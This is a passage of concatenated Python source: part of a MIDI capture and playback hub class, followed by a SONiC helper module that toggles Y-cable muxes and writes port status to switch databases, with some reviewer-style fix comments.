      if open_note is not None and msg.note == open_note.pitch:
        open_note.end_time = msg.time
        self._open_note = None
      # Otherwise, this is not the note we're tracking; drop it.
    elif msg.type == 'note_on':
      open_note = self._open_note
      if open_note:
        if open_note.pitch == msg.note:
          # Just a repeat of the previous note_on; ignore it.
          return
        # A different pitch arrived; end the previous note first.
        open_note.end_time = msg.time
      self._open_note = self._add_note(msg)
class PolyphonicMidiCaptor(MidiCaptor):
  """A MidiCaptor for polyphonic melodies."""

  def __init__(self, *args, **kwargs):
    # Open NoteSequence.Note messages, keyed by pitch.
    self._open_notes = dict()
    super(PolyphonicMidiCaptor, self).__init__(*args, **kwargs)

  @concurrency.serialized
  def _capture_message(self, msg):
    """Handles a single incoming MIDI message during capture.

    Args:
      msg: The mido.Message MIDI message to handle.
    """
    is_note_off = (
        msg.type == 'note_off' or
        (msg.type == 'note_on' and msg.velocity == 0))
    if is_note_off:
      # Close the matching open note, if any; otherwise drop the message.
      open_note = self._open_notes.pop(msg.note, None)
      if open_note is not None:
        open_note.end_time = msg.time
    elif msg.type == 'note_on':
      if msg.note in self._open_notes:
        # Likely just a repeat of the previous note_on; ignore it.
        return
      fresh_note = self._add_note(msg)
      self._open_notes[fresh_note.pitch] = fresh_note
class TextureType(object):
  """An Enum specifying the type of musical texture."""
  # Integer values kept as-is for callers that compare against raw ints.
  MONOPHONIC, POLYPHONIC = 1, 2
class MidiHub(object):
  """A MIDI interface for capturing and playing NoteSequences.

  Ignores/filters `program_change` messages. Assumes all messages are on the
  same channel.

  Args:
    input_midi_port: The string MIDI port name or mido.ports.BaseInput object
        to use for input. If a name is given that is not an available port, a
        virtual port will be opened with that name.
    output_midi_port: The string MIDI port name or mido.ports.BaseOutput
        object to use for output. If a name is given that is not an available
        port, a virtual port will be opened with that name.
    texture_type: A TextureType Enum specifying the musical texture to assume
        during capture, passthrough, and playback.
    passthrough: A boolean specifying whether or not to pass incoming
        messages through to the output, applying the appropriate texture
        rules.
    playback_channel: The MIDI channel to send playback events.
    playback_offset: The float time in seconds to adjust the playback event
        times by.
  """

  def __init__(self, input_midi_port, output_midi_port, texture_type,
               passthrough=True, playback_channel=0, playback_offset=0.0):
    self._texture_type = texture_type
    self._passthrough = passthrough
    self._playback_channel = playback_channel
    self._playback_offset = playback_offset
    # When `passthrough` is True, this is the set of open MIDI note pitches.
    self._open_notes = set()
    # This lock is used by the serialized decorator.
    self._lock = threading.RLock()
    # A dictionary mapping a compiled MidiSignal regex to a condition
    # variable that will be notified when a matching message is received.
    self._signals = {}
    # A dictionary mapping a compiled MidiSignal regex to a list of functions
    # that will be called with the triggering message in individual threads
    # when a matching message is received.
    self._callbacks = defaultdict(list)
    # A dictionary mapping integer control numbers to most recently-received
    # integer value.
    self._control_values = {}
    # Threads actively being used to capture incoming messages.
    self._captors = []
    # Potentially active player threads.
    self._players = []
    self._metronome = None

    # Open MIDI ports.
    self._inport = (
        input_midi_port if isinstance(input_midi_port, mido.ports.BaseInput)
        else mido.open_input(
            input_midi_port,
            virtual=input_midi_port not in get_available_input_ports()))
    self._outport = (
        output_midi_port if isinstance(output_midi_port,
                                       mido.ports.BaseOutput)
        else mido.open_output(
            output_midi_port,
            virtual=output_midi_port not in get_available_output_ports()))
    # Start processing incoming messages.
    self._inport.callback = self._timestamp_and_handle_message

  def __del__(self):
    """Stops all running threads and waits for them to terminate."""
    for captor in self._captors:
      captor.stop(block=False)
    for player in self._players:
      player.stop(block=False)
    self.stop_metronome()
    for captor in self._captors:
      captor.join()
    for player in self._players:
      player.join()

  @property
  @concurrency.serialized
  def passthrough(self):
    return self._passthrough

  @passthrough.setter
  @concurrency.serialized
  def passthrough(self, value):
    """Sets passthrough value, closing all open notes if being disabled."""
    if self._passthrough == value:
      return
    # Close all open notes.
    while self._open_notes:
      self._outport.send(mido.Message('note_off',
                                      note=self._open_notes.pop()))
    self._passthrough = value

  def _timestamp_and_handle_message(self, msg):
    """Stamps message with current time and passes it to the handler."""
    if msg.type == 'program_change':
      return
    if not msg.time:
      msg.time = time.time()
    self._handle_message(msg)

  @concurrency.serialized
  def _handle_message(self, msg):
    """Handles a single incoming MIDI message.

    -If the message is being used as a signal, notifies threads waiting on
     the appropriate condition variable.
    -Adds the message to any capture queues.
    -Passes the message through to the output port, if appropriate.

    Args:
      msg: The mido.Message MIDI message to handle.
    """
    # Notify any threads waiting for this message.
    msg_str = str(msg)
    for regex in list(self._signals):
      if regex.match(msg_str) is not None:
        self._signals[regex].notify_all()
        del self._signals[regex]

    # Call any callbacks waiting for this message.
    for regex in list(self._callbacks):
      if regex.match(msg_str) is not None:
        for fn in self._callbacks[regex]:
          threading.Thread(target=fn, args=(msg,)).start()
        del self._callbacks[regex]

    # Remove any captors that are no longer alive.
    self._captors[:] = [t for t in self._captors if t.is_alive()]
    # Add a different copy of the message to the receive queue of each live
    # capture thread.
    for t in self._captors:
      t.receive(msg.copy())

    # Update control values if this is a control change message.
    if msg.type == 'control_change':
      if self._control_values.get(msg.control, None) != msg.value:
        tf.logging.debug('Control change %d: %d', msg.control, msg.value)
      self._control_values[msg.control] = msg.value

    # Pass the message through to the output port, if appropriate.
    if not self._passthrough:
      pass
    elif self._texture_type == TextureType.POLYPHONIC:
      if msg.type == 'note_on' and msg.velocity > 0:
        self._open_notes.add(msg.note)
      elif (msg.type == 'note_off' or
            (msg.type == 'note_on' and msg.velocity == 0)):
        self._open_notes.discard(msg.note)
      self._outport.send(msg)
    elif self._texture_type == TextureType.MONOPHONIC:
      assert len(self._open_notes) <= 1
      if msg.type not in ['note_on', 'note_off']:
        self._outport.send(msg)
      elif ((msg.type == 'note_off' or
             msg.type == 'note_on' and msg.velocity == 0) and
            msg.note in self._open_notes):
        self._outport.send(msg)
        self._open_notes.remove(msg.note)
      elif msg.type == 'note_on' and msg.velocity > 0:
        if self._open_notes:
          # Monophonic: end the currently-sounding note before starting the
          # new one.
          self._outport.send(
              mido.Message('note_off', note=self._open_notes.pop()))
        self._outport.send(msg)
        self._open_notes.add(msg.note)

  def start_capture(self, qpm, start_time, stop_time=None, stop_signal=None):
    """Starts a MidiCaptor to compile incoming messages into a NoteSequence.

    If neither `stop_time` nor `stop_signal`, are provided, the caller must
    explicitly stop the returned capture thread. If both are specified, the
    one that occurs first will stop the capture.

    Args:
      qpm: The integer quarters per minute to use for the captured sequence.
      start_time: The float wall time in seconds to start the capture. May be
          in the past. Used for beat alignment.
      stop_time: The optional float wall time in seconds to stop the capture.
      stop_signal: The optional mido.Message to use as a signal to use to
          stop the capture.

    Returns:
      The MidiCaptor thread.
    """
    captor_class = (MonophonicMidiCaptor if
                    self._texture_type == TextureType.MONOPHONIC else
                    PolyphonicMidiCaptor)
    captor = captor_class(qpm, start_time, stop_time, stop_signal)
    with self._lock:
      self._captors.append(captor)
    captor.start()
    return captor

  def capture_sequence(self, qpm, start_time, stop_time=None,
                       stop_signal=None):
    """Compiles and returns incoming messages into a NoteSequence.

    Blocks until capture stops. At least one of `stop_time` or `stop_signal`
    must be specified. If both are specified, the one that occurs first will
    stop the capture.

    Args:
      qpm: The integer quarters per minute to use for the captured sequence.
      start_time: The float wall time in seconds to start the capture. May be
          in the past. Used for beat alignment.
      stop_time: The optional float wall time in seconds to stop the capture.
      stop_signal: The optional mido.Message to use as a signal to use to
          stop the capture.

    Returns:
      The captured NoteSequence proto.

    Raises:
      MidiHubException: When neither `stop_time` nor `stop_signal` are
          provided.
    """
    if stop_time is None and stop_signal is None:
      raise MidiHubException(
          'At least one of `stop_time` and `stop_signal` must be provided to '
          '`capture_sequence` call.')
    captor = self.start_capture(qpm, start_time, stop_time, stop_signal)
    captor.join()
    return captor.captured_sequence()

  @concurrency.serialized
  def wait_for_event(self, signal=None, timeout=None):
    """Blocks until a matching mido.Message arrives or the timeout occurs.

    Exactly one of `signal` or `timeout` must be specified. Using a timeout
    with a threading.Condition object causes additional delays when notified.

    Args:
      signal: A MidiSignal to use as a signal to stop waiting, or None.
      timeout: A float timeout in seconds, or None.

    Raises:
      MidiHubException: If neither `signal` nor `timeout` or both are
          specified.
    """
    if (signal, timeout).count(None) != 1:
      raise MidiHubException(
          'Exactly one of `signal` or `timeout` must be provided to '
          '`wait_for_event` call.')

    if signal is None:
      concurrency.Sleeper().sleep(timeout)
      return

    signal_pattern = str(signal)
    # Reuse an existing condition variable registered for the same pattern.
    # Fixed: the previous code iterated the dict directly
    # (`for regex, cond_var in self._signals:`), which yields only keys and
    # raises on unpacking, and it also left `cond_var` bound to the last
    # non-matching entry after an unsuccessful scan.
    cond_var = None
    for regex, existing_cond_var in self._signals.items():
      if regex.pattern == signal_pattern:
        cond_var = existing_cond_var
        break
    if cond_var is None:
      cond_var = threading.Condition(self._lock)
      self._signals[re.compile(signal_pattern)] = cond_var

    cond_var.wait()

  @concurrency.serialized
  def wake_signal_waiters(self, signal=None):
    """Wakes all threads waiting on a signal event.

    Args:
      signal: The MidiSignal to wake threads waiting on, or None to wake all.
    """
    for regex in list(self._signals):
      if signal is None or regex.pattern == str(signal):
        self._signals[regex].notify_all()
        del self._signals[regex]
    # NOTE(review): MidiCaptor does not define `wake_signal_waiters` in this
    # file — confirm it exists on the captor class or its bases.
    for captor in self._captors:
      captor.wake_signal_waiters(signal)

  @concurrency.serialized
  def start_metronome(self, qpm, start_time):
    """Starts or updates the metronome with the given arguments.

    Args:
      qpm: The quarter notes per minute to use.
      start_time: The wall time in seconds that the metronome is started on
          for synchronization and beat alignment. May be in the past.
    """
    if self._metronome is not None and self._metronome.is_alive():
      self._metronome.update(qpm, start_time)
    else:
      self._metronome = Metronome(self._outport, qpm, start_time)
      self._metronome.start()

  @concurrency.serialized
  def stop_metronome(self, stop_time=0, block=True):
    """Stops the metronome at the given time if it is currently running.

    Args:
      stop_time: The float wall time in seconds after which the metronome
          should stop. By default, stops at next tick.
      block: If true, blocks until metronome is stopped.
    """
    if self._metronome is None:
      return
    self._metronome.stop(stop_time, block)
    self._metronome = None

  def start_playback(self, sequence, start_time=None, allow_updates=False):
    """Plays the notes in a NoteSequence via the MIDI output port.

    Args:
      sequence: The NoteSequence to play, with times based on the wall clock.
      start_time: The float time before which to strip events, or None for
          call time. Events before this time will be sent immediately on
          start.
      allow_updates: A boolean specifying whether or not the player should
          allow the sequence to be updated and stay alive until `stop` is
          called.

    Returns:
      The MidiPlayer thread handling playback to enable updating.
    """
    # Fixed: the default was previously `start_time=time.time()`, which is
    # evaluated once at module import and so froze the "default" at import
    # time. A None sentinel restores the documented call-time default.
    if start_time is None:
      start_time = time.time()
    player = MidiPlayer(self._outport, sequence, start_time, allow_updates,
                        self._playback_channel, self._playback_offset)
    with self._lock:
      self._players.append(player)
    player.start()
    return player

  @concurrency.serialized
  def control_value(self, control_number):
    """Returns the most recently received value for the given control number.

    Args:
      control_number: The integer control number to return the value for, or
          None.

    Returns:
      The most recently received integer value for the given control number,
      or None if no values have been received for that control.
    """
    if control_number is None:
      return None
    return self._control_values.get(control_number)

  def send_control_change(self, control_number, value):
    """Sends the specified control change message on the output port."""
    self._outport.send(
        mido.Message(
            type='control_change',
            control=control_number,
            value=value))

  @concurrency.serialized
  def register_callback(self, fn, signal):
    """Calls `fn` at the next signal message.

    The callback function must take exactly one argument, which will be the
    message triggering the signal.

    Survives until signal is called or the MidiHub is destroyed.

    Args:
      fn: The callback function to call, passing in the triggering message.
      signal: A MidiSignal to use as a signal to call `fn` on the triggering
          message.
    """
    self._callbacks[re.compile(str(signal))].append(fn)
|
y_cable_helper.py | """
y_cable_helper.py
helper utlities configuring y_cable for xcvrd daemon
"""
import copy
import datetime
import functools
import os
import re
import threading
import time
from importlib import import_module

from sonic_py_common import daemon_base, logger
from sonic_py_common import multi_asic
from sonic_y_cable import y_cable_vendor_mapping
from swsscommon import swsscommon

from . import sfp_status_helper
from .port_mapping import read_port_config_change
# Timeout passed to swsscommon select operations (presumably milliseconds —
# confirm against swsscommon.Select usage elsewhere in the daemon).
SELECT_TIMEOUT = 1000

# Platform access objects; populated by init_ports_status_for_y_cable().
y_cable_platform_sfputil = None
y_cable_platform_chassis = None

SYSLOG_IDENTIFIER = "y_cable_helper"

helper_logger = logger.Logger(SYSLOG_IDENTIFIER)

# Cached y_cable driver instances and their per-port locks, keyed by
# physical port number. Maintained by the mux-table add/delete helpers.
y_cable_port_instances = {}
y_cable_port_locks = {}

# Mux direction encoding as reported by the vendor drivers'
# get_mux_direction(): no ToR active, ToR-A active, ToR-B active.
Y_CABLE_STATUS_NO_TOR_ACTIVE = 0
Y_CABLE_STATUS_TORA_ACTIVE = 1
Y_CABLE_STATUS_TORB_ACTIVE = 2

# Set of valid switch-state values; used to validate get_mux_direction()
# results in read_y_cable_and_update_statedb_port_tbl().
y_cable_switch_state_values = {
    Y_CABLE_STATUS_NO_TOR_ACTIVE,
    Y_CABLE_STATUS_TORA_ACTIVE,
    Y_CABLE_STATUS_TORB_ACTIVE
}

# State-DB table names for mux cable static info and runtime info.
MUX_CABLE_STATIC_INFO_TABLE = "MUX_CABLE_STATIC_INFO"
MUX_CABLE_INFO_TABLE = "MUX_CABLE_INFO"

# Error sentinels returned by the logical-to-physical lookup helpers.
PHYSICAL_PORT_MAPPING_ERROR = -1
PORT_INSTANCE_ERROR = -1

# All lookup-error sentinel values, for membership tests by callers.
port_mapping_error_values = {
    PHYSICAL_PORT_MAPPING_ERROR,
    PORT_INSTANCE_ERROR
}
def format_mapping_identifier(string):
    """
    Takes an arbitrary string and creates a valid entity for port mapping file.
    The input could contain trailing and leading spaces, upper cases etc.
    Convert them to what is defined in the y_cable vendor_mapping file.
    Returns None (after logging a warning) when the input is not a string.
    """
    if not isinstance(string, str):
        helper_logger.log_warning(
            "Error: mapping identifier is not a string {}".format(string))
        return

    # Lowercase, trim surrounding whitespace, then collapse every internal
    # whitespace run into a single underscore.
    normalized = string.lower().strip()
    return re.sub(r'\s+', '_', normalized)
def y_cable_wrapper_get_presence(physical_port):
    """Return transceiver presence, preferring the platform-chassis API."""
    chassis = y_cable_platform_chassis
    if chassis is not None:
        try:
            return chassis.get_sfp(physical_port).get_presence()
        except NotImplementedError:
            # Platform does not implement the chassis API; fall through.
            pass
    return y_cable_platform_sfputil.get_presence(physical_port)
def hook_y_cable_simulated(target):
    """
    Decorator to add hook for using the simulated y_cable driver.
    This decorator checks existence of the configuration file required by the simulated y_cable driver. If the
    configuration file is found, then override the "manufacturer" and "model" fields with value "microsoft" and
    "simulated" in the collected transceiver info dict. Consequently, instance of the simulated y_cable driver
    class will be initialized.
    When the configuration file is not found on system, then just return the original transceiver info to initialize
    instance of y_cable driver class of whatever actually plugged physical y_cable.
    For test systems using simulated y_cable, we can just inject the simulated y_cable driver config file then
    restart the pmon service before testing starts.

    Args:
        target (function): The function collecting transceiver info.
    Returns:
        function: Wrapped *target* that post-processes its result dict.
    """
    MUX_SIMULATOR_CONFIG_FILE = "/etc/sonic/mux_simulator.json"
    VENDOR = "microsoft"
    MODEL = "simulated"

    # IMPROVEMENT: functools.wraps preserves __name__ as before, and also
    # __doc__, __module__ and __wrapped__, which the previous manual
    # `wrapper.__name__ = target.__name__` assignment did not.
    @functools.wraps(target)
    def wrapper(*args, **kwargs):
        res = target(*args, **kwargs)
        # Only override when the simulator config file exists on the system.
        if os.path.exists(MUX_SIMULATOR_CONFIG_FILE):
            res["manufacturer"] = VENDOR
            res["model"] = MODEL
        return res

    return wrapper
@hook_y_cable_simulated
def y_cable_wrapper_get_transceiver_info(physical_port):
    """Return the transceiver info dict, preferring the platform-chassis API."""
    chassis = y_cable_platform_chassis
    if chassis is not None:
        try:
            return chassis.get_sfp(physical_port).get_transceiver_info()
        except NotImplementedError:
            # Platform does not implement the chassis API; fall through.
            pass
    return y_cable_platform_sfputil.get_transceiver_info_dict(physical_port)
def get_ycable_physical_port_from_logical_port(logical_port_name, port_mapping):
    """Resolve a logical port to its single physical port; -1 on failure."""
    physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)

    if len(physical_port_list) != 1:
        # Y cable ports should always have a one-to-one mapping of
        # physical-to-logical; anything else should not happen.
        helper_logger.log_warning(
            "Error: Retreived multiple ports for a Y cable table port {} while retreiving physical port mapping".format(logical_port_name))
        return -1

    physical_port = physical_port_list[0]
    if not y_cable_wrapper_get_presence(physical_port):
        helper_logger.log_warning(
            "Error: Could not establish presence for Y cable port {} while retreiving physical port mapping".format(logical_port_name))
        return -1

    return physical_port
def get_ycable_port_instance_from_logical_port(logical_port_name, port_mapping):
    """Look up the cached y_cable driver instance for a logical port.

    Args:
        logical_port_name: logical port name (e.g. "Ethernet4").
        port_mapping: helper used to resolve logical-to-physical ports.

    Returns:
        The cached y_cable port instance on success, or PORT_INSTANCE_ERROR
        (-1) when the port is absent, no instance is cached, or the
        physical mapping is not one-to-one.
    """
    physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)

    if len(physical_port_list) != 1:
        # Y cable ports should always have a one-to-one mapping of
        # physical-to-logical; anything else should not happen.
        helper_logger.log_warning(
            "Error: Retreived multiple ports for a Y cable table port {} while trying to toggle the mux".format(logical_port_name))
        # CONSISTENCY FIX: return the named sentinel (same value as the
        # previous bare -1) to match every other failure path here.
        return PORT_INSTANCE_ERROR

    physical_port = physical_port_list[0]
    if not y_cable_wrapper_get_presence(physical_port):
        helper_logger.log_warning(
            "Error: Could not establish presence for Y cable port {} while trying to toggle the mux".format(logical_port_name))
        return PORT_INSTANCE_ERROR

    port_instance = y_cable_port_instances.get(physical_port)
    if port_instance is None:
        helper_logger.log_error(
            "Error: Could not get port instance from the dict for Y cable port {}".format(logical_port_name))
        return PORT_INSTANCE_ERROR

    return port_instance
def set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_rsp_tbl):
    """Publish the nine firmware-version fields for *port* into the
    show-firmware response table; always returns 0."""
    version_keys = (
        'version_self_active', 'version_self_inactive', 'version_self_next',
        'version_peer_active', 'version_peer_inactive', 'version_peer_next',
        'version_nic_active', 'version_nic_inactive', 'version_nic_next',
    )
    fvs = swsscommon.FieldValuePairs(
        [(key, str(mux_info_dict[key])) for key in version_keys])
    xcvrd_show_fw_rsp_tbl.set(port, fvs)
    return 0
def set_result_and_delete_port(result, actual_result, command_table, response_table, port):
    """Record the command outcome in the response table, then clear the
    pending command entry for *port*."""
    outcome = swsscommon.FieldValuePairs([(result, str(actual_result))])
    response_table.set(port, outcome)
    command_table._del(port)
# Delete port from Y cable status table
def delete_port_from_y_cable_table(logical_port_name, y_cable_tbl):
    """Remove *logical_port_name* from *y_cable_tbl*; no-op when the table is None."""
    if y_cable_tbl is None:
        return
    y_cable_tbl._del(logical_port_name)
def update_table_mux_status_for_response_tbl(table_name, status, logical_port_name):
    """Write a 'response' field carrying *status* for *logical_port_name*."""
    table_name.set(logical_port_name, swsscommon.FieldValuePairs([('response', status)]))
    helper_logger.log_debug("Y_CABLE_DEBUG: Successful in returning probe port status {}".format(logical_port_name))
def update_table_mux_status_for_statedb_port_tbl(table_name, status, read_side, active_side, logical_port_name):
    """Publish state, read_side and active_side for the port into the
    given state-DB table (sides are stringified for the DB)."""
    fields = [('state', status),
              ('read_side', str(read_side)),
              ('active_side', str(active_side))]
    table_name.set(logical_port_name, swsscommon.FieldValuePairs(fields))
def y_cable_toggle_mux_torA(physical_port):
    """Toggle the mux on *physical_port* to ToR A.

    Returns:
        1 on success; -1 when no cached port instance exists or the
        vendor toggle API fails/raises.
    """
    port_instance = y_cable_port_instances.get(physical_port)
    if port_instance is None:
        # MODERNIZATION: threading.currentThread()/getName() are deprecated
        # aliases; threading.current_thread().name is the supported form.
        helper_logger.log_error(
            "Error: Could not get port instance for read side for Y cable port {} {}".format(physical_port, threading.current_thread().name))
        return -1

    try:
        update_status = port_instance.toggle_mux_to_tor_a()
    except Exception as e:
        # Best-effort: record the failure and report it via the -1 path below.
        update_status = -1
        helper_logger.log_warning("Failed to execute the toggle mux ToR A API for port {} due to {} {}".format(physical_port, repr(e), threading.current_thread().name))

    helper_logger.log_debug("Y_CABLE_DEBUG: Status of toggling mux to ToR A for port {} status {} {}".format(physical_port, update_status, threading.current_thread().name))
    if update_status is True:
        return 1
    else:
        helper_logger.log_warning(
            "Error: Could not toggle the mux for port {} to torA write eeprom failed".format(physical_port))
        return -1
def y_cable_toggle_mux_torB(physical_port):
    """Toggle the mux on *physical_port* to ToR B.

    Returns:
        2 on success; -1 when no cached port instance exists or the
        vendor toggle API fails/raises.
    """
    port_instance = y_cable_port_instances.get(physical_port)
    if port_instance is None:
        # MODERNIZATION: threading.currentThread()/getName() are deprecated
        # aliases; threading.current_thread().name is the supported form.
        helper_logger.log_error("Error: Could not get port instance for read side for Y cable port {} {}".format(physical_port, threading.current_thread().name))
        return -1

    try:
        update_status = port_instance.toggle_mux_to_tor_b()
    except Exception as e:
        # Best-effort: record the failure and report it via the -1 path below.
        update_status = -1
        helper_logger.log_warning("Failed to execute the toggle mux ToR B API for port {} due to {} {}".format(physical_port, repr(e), threading.current_thread().name))

    helper_logger.log_debug("Y_CABLE_DEBUG: Status of toggling mux to ToR B for port {} {} {}".format(physical_port, update_status, threading.current_thread().name))
    if update_status is True:
        return 2
    else:
        helper_logger.log_warning(
            "Error: Could not toggle the mux for port {} to torB write eeprom failed".format(physical_port))
        return -1
def update_tor_active_side(read_side, state, logical_port_name, port_mapping):
    """Toggle the mux for a logical port based on this ToR's read side.

    Mapping: on read side 1, "active" toggles to ToR A and "standby" to
    ToR B; on read side 2 the mapping is inverted.

    Returns the toggle helper's result (1 for ToR A, 2 for ToR B, -1 on
    toggle failure), -1 when presence cannot be established or the
    physical mapping is not one-to-one, and implicitly None when
    read_side is not 1/2 or state is not "active"/"standby"
    (NOTE(review): the fall-through None return looks unintended —
    confirm against callers).
    """
    physical_port_list = port_mapping.logical_port_name_to_physical_port_list(
        logical_port_name)

    if len(physical_port_list) == 1:

        physical_port = physical_port_list[0]
        if y_cable_wrapper_get_presence(physical_port):
            # read_side may arrive as a string from the DB; normalize to int.
            if int(read_side) == 1:
                if state == "active":
                    return y_cable_toggle_mux_torA(physical_port)
                elif state == "standby":
                    return y_cable_toggle_mux_torB(physical_port)
            elif int(read_side) == 2:
                if state == "active":
                    return y_cable_toggle_mux_torB(physical_port)
                elif state == "standby":
                    return y_cable_toggle_mux_torA(physical_port)

            # TODO: Should we confirm that the mux was indeed toggled?

        else:
            helper_logger.log_warning(
                "Error: Could not establish presence for Y cable port {} while trying to toggle the mux".format(logical_port_name))
            return -1

    else:
        # Y cable ports should always have
        # one to one mapping of physical-to-logical
        # This should not happen
        helper_logger.log_warning(
            "Error: Retreived multiple ports for a Y cable table port {} while trying to toggle the mux".format(logical_port_name))
        return -1
def update_appdb_port_mux_cable_response_table(logical_port_name, port_mapping, asic_index, appl_db, read_side):
    """Answer a mux probe by writing 'active'/'standby'/'unknown' into
    APPL_DB's MUX_CABLE_RESPONSE_TABLE for *logical_port_name*.

    Every failure path (missing instance, unknown read side, EEPROM/vendor
    API error, bad mapping) still writes a response — 'unknown' — so the
    probe requester is never left waiting.
    """
    status = None
    y_cable_response_tbl = {}

    y_cable_response_tbl[asic_index] = swsscommon.Table(
        appl_db[asic_index], "MUX_CABLE_RESPONSE_TABLE")
    physical_port_list = port_mapping.logical_port_name_to_physical_port_list(
        logical_port_name)

    if len(physical_port_list) == 1:
        physical_port = physical_port_list[0]
        if y_cable_wrapper_get_presence(physical_port):
            port_instance = y_cable_port_instances.get(physical_port)
            # -1 is the cached error sentinel; treat it like a missing instance.
            if port_instance is None or port_instance == -1:
                status = 'unknown'
                update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
                helper_logger.log_error(
                    "Error: Could not get port instance to perform update appdb for read side for Y cable port {}".format(logical_port_name))
                return

            if read_side is None:
                status = 'unknown'
                update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
                helper_logger.log_warning(
                    "Error: Could not get read side to perform update appdb for mux cable port probe command logical port {} and physical port {}".format(logical_port_name, physical_port))
                return

            active_side = None
            # Vendor API call may raise; map any failure onto the -1 sentinel
            # so the validation below reports 'unknown'.
            try:
                active_side = port_instance.get_mux_direction()
            except Exception as e:
                active_side = -1
                helper_logger.log_warning("Failed to execute the get_mux_direction for port {} due to {}".format(physical_port,repr(e)))

            if active_side is None or active_side == port_instance.EEPROM_ERROR or active_side < 0 :
                status = 'unknown'
                update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
                helper_logger.log_warning(
                    "Error: Could not get active side to perform update appdb for mux cable port probe command logical port {} and physical port {}".format(logical_port_name, physical_port))
                return

            # This ToR is 'active' when its read side matches the mux's
            # active side (1 or 2); 'standby' when they differ.
            if read_side == active_side and (active_side == 1 or active_side == 2):
                status = 'active'
            elif read_side != active_side and (active_side == 1 or active_side == 2):
                status = 'standby'
            else:
                status = 'unknown'
                helper_logger.log_warning(
                    "Error: Could not get state to perform update appdb for mux cable port probe command logical port {} and physical port {}".format(logical_port_name, physical_port))

            helper_logger.log_debug("Y_CABLE_DEBUG: notifying a probe for port status {} {}".format(logical_port_name, status))

            update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)

        else:
            status = 'unknown'
            update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
            helper_logger.log_warning(
                "Error: Could not establish presence for Y cable port {} while responding to command probe".format(logical_port_name))
    else:
        # Y cable ports should always have
        # one to one mapping of physical-to-logical
        # This should not happen
        status = 'unknown'
        update_table_mux_status_for_response_tbl(y_cable_response_tbl[asic_index], status, logical_port_name)
        helper_logger.log_warning(
            "Error: Retreived multiple ports for a Y cable port {} while responding to command probe".format(logical_port_name))
def read_y_cable_and_update_statedb_port_tbl(logical_port_name, port_mapping, mux_config_tbl):
    """Read this cable's read side and active side from the hardware and
    publish state/read_side/active_side into *mux_config_tbl* (state DB).

    Every failure path publishes "unknown" with both sides set to -1, so
    the table always ends up with an entry for the port.
    """
    physical_port_list = port_mapping.logical_port_name_to_physical_port_list(
        logical_port_name)

    read_side = None
    active_side = None
    status = None
    if len(physical_port_list) == 1:
        physical_port = physical_port_list[0]
        if y_cable_wrapper_get_presence(physical_port):
            port_instance = y_cable_port_instances.get(physical_port)
            # -1 is the cached error sentinel; treat like a missing instance.
            if port_instance is None or port_instance == -1:
                read_side = active_side = -1
                update_table_mux_status_for_statedb_port_tbl(
                    mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
                helper_logger.log_error(
                    "Error: Could not get port instance to perform read_y_cable update state db for read side for Y cable port {}".format(logical_port_name))
                return

            # Serialize vendor API access with this port's lock.
            with y_cable_port_locks[physical_port]:
                try:
                    read_side = port_instance.get_read_side()
                except Exception as e:
                    read_side = None
                    helper_logger.log_warning("Failed to execute the get_read_side for port {} due to {}".format(physical_port,repr(e)))

            if read_side is None or read_side < 0 or read_side == port_instance.EEPROM_ERROR:
                read_side = active_side = -1
                update_table_mux_status_for_statedb_port_tbl(
                    mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
                helper_logger.log_error(
                    "Error: Could not establish the read side for Y cable port {} to perform read_y_cable update state db".format(logical_port_name))
                return

            with y_cable_port_locks[physical_port]:
                try:
                    active_side = port_instance.get_mux_direction()
                except Exception as e:
                    active_side = None
                    helper_logger.log_warning("Failed to execute the get_mux_direction for port {} due to {}".format(physical_port,repr(e)))

            # Valid directions are the y_cable_switch_state_values set {0, 1, 2}.
            if active_side is None or active_side not in y_cable_switch_state_values:
                read_side = active_side = -1
                update_table_mux_status_for_statedb_port_tbl(
                    mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
                helper_logger.log_error(
                    "Error: Could not establish the active side for Y cable port {} to perform read_y_cable update state db".format(logical_port_name))
                return

            # 'active' when our read side is the mux's active side (1 or 2);
            # 'standby' when it is the other side; anything else is unknown.
            if read_side == active_side and (active_side == 1 or active_side == 2):
                status = 'active'
            elif read_side != active_side and (active_side == 1 or active_side == 2):
                status = 'standby'
            else:
                status = 'unknown'
                helper_logger.log_warning(
                    "Error: Could not establish the active status for Y cable port {} to perform read_y_cable update state db".format(logical_port_name))

            update_table_mux_status_for_statedb_port_tbl(
                mux_config_tbl, status, read_side, active_side, logical_port_name)
            return

        else:
            read_side = active_side = -1
            update_table_mux_status_for_statedb_port_tbl(
                mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
            helper_logger.log_warning(
                "Error: Could not establish presence for Y cable port {} to perform read_y_cable update state db".format(logical_port_name))
    else:
        # Y cable ports should always have
        # one to one mapping of physical-to-logical
        # This should not happen
        read_side = active_side = -1
        update_table_mux_status_for_statedb_port_tbl(
            mux_config_tbl, "unknown", read_side, active_side, logical_port_name)
        helper_logger.log_warning(
            "Error: Retreived multiple ports for a Y cable port {} to perform read_y_cable update state db".format(logical_port_name))
def create_tables_and_insert_mux_unknown_entries(state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, port_mapping):
    """Connect the state-DB tables for every front-end namespace, then seed
    the hw-mux table with this port's current (likely unknown) status."""
    for namespace in multi_asic.get_front_end_namespaces():
        asic_id = multi_asic.get_asic_index_from_namespace(namespace)
        state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
        y_cable_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
        static_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], MUX_CABLE_STATIC_INFO_TABLE)
        mux_tbl[asic_id] = swsscommon.Table(
            state_db[asic_id], MUX_CABLE_INFO_TABLE)

    # fill the newly found entry
    read_y_cable_and_update_statedb_port_tbl(
        logical_port_name, port_mapping, y_cable_tbl[asic_index])
